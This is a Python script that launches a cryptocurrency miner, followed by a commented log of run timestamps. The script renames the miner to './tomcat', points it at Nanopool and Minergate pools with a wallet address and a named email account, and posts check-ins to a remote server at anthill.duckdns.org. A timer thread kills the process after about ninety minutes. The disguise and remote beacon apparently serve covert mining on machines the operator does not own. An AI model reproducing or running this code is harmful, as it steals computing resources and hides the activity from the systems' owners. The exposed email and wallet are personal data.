import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:01.768277
#2018-02-17 16:05:07.680904
#2018-02-17 17:52:07.818131
#2018-02-17 19:39:06.083242
#2018-02-17 21:27:05.488178
#2018-02-17 23:11:05.909745
#2018-02-18 00:58:06.534550
#2018-02-18 02:46:01.961618
#2018-02-18 04:37:04.952787
#2018-02-18 06:28:01.736386
#2018-02-18 08:17:02.172485
#2018-02-18 10:05:08.935941
#2018-02-18 11:51:05.010135
#2018-02-18 13:36:04.334463
#2018-02-18 15:26:01.769603
#2018-02-18 17:15:08.797187
#2018-02-18 19:03:04.429387
#2018-02-18 20:50:07.150507
#2018-02-18 22:36:04.933111
#2018-02-19 00:24:06.808030
#2018-02-19 02:10:06.345598
#2018-02-19 03:56:01.521062
#2018-02-19 05:40:07.666360
#2018-02-19 07:28:03.996553
#2018-02-19 09:18:08.406122
#2018-02-19 11:07:08.520984
#2018-02-19 12:55:01.660542
#2018-02-19 14:42:01.567677
#2018-02-19 16:29:08.642919
#2018-02-19 18:16:01.601204
#2018-02-19 20:02:02.017205
#2018-02-19 21:50:04.183107
#2018-02-19 23:36:05.714794
#2018-02-20 01:21:04.154363
#2018-02-20 03:10:08.048853
#2018-02-20 04:57:05.495228
#2018-02-20 06:38:06.335535
#2018-02-20 08:23:06.345058
#2018-02-20 10:08:07.044214
#2018-02-20 11:52:08.728366
#2018-02-20 13:39:09.497574
#2018-02-20 15:22:05.941245
#2018-02-20 17:08:08.756459
#2018-02-20 18:58:01.415177
#2018-02-20 20:47:01.835117
#2018-02-20 22:32:05.406224
#2018-02-21 00:13:05.155788
#2018-02-21 01:58:09.163365
#2018-02-21 03:48:04.308387
#2018-02-21 05:31:05.577847
#2018-02-21 07:19:03.978073
#2018-02-21 09:03:07.678814
#2018-02-21 10:52:09.480540
#2018-02-21 12:37:10.780642
#2018-02-21 14:24:01.513115
#2018-02-21 16:12:05.590327
#2018-02-21 18:03:09.011743
#2018-02-21 19:50:02.758790
#2018-02-21 21:37:04.385155
#2018-02-21 23:23:03.567594
#2018-02-22 01:11:06.203322
#2018-02-22 03:01:07.667867
#2018-02-22 04:47:07.175467
#2018-02-22 06:32:03.595732
#2018-02-22 08:19:05.490123
#2018-02-22 10:07:03.803353
#2018-02-22 11:52:10.549240
#2018-02-22 13:38:02.167004
#2018-02-22 15:26:06.008975
#2018-02-22 17:13:06.645235
#2018-02-22 19:01:01.652724
#2018-02-22 20:52:04.675998
#2018-02-22 22:37:04.107538
#2018-02-23 00:23:08.341240
#2018-02-23 02:11:06.228882
#2018-02-23 03:58:07.031893
#2018-02-23 05:45:01.583532
#2018-02-23 07:35:06.995228
#2018-02-23 09:38:07.513616
#2018-02-23 11:42:07.400943
#2018-02-23 13:33:07.582814
#2018-02-23 15:18:07.703762
#2018-02-23 17:07:02.175905
#2018-02-23 18:36:08.818437
#2018-02-23 20:17:03.992559
#2018-02-23 21:49:08.278353
#2018-02-23 23:26:01.775707
#2018-02-24 01:05:05.119375
#2018-02-24 02:47:03.873279
#2018-02-24 04:21:03.684926
#2018-02-24 05:50:08.680389
#2018-02-24 07:27:04.281112
#2018-02-24 08:59:06.399121
#2018-02-24 10:48:06.180619
#2018-02-24 12:36:03.621206
#2018-02-24 14:25:06.335492
#2018-02-24 16:13:05.612458
#2018-02-24 18:06:06.071556
#2018-02-24 19:52:05.345497
#2018-02-24 22:54:04.016497
#2018-02-25 03:04:02.219259
#2018-02-25 06:53:03.904229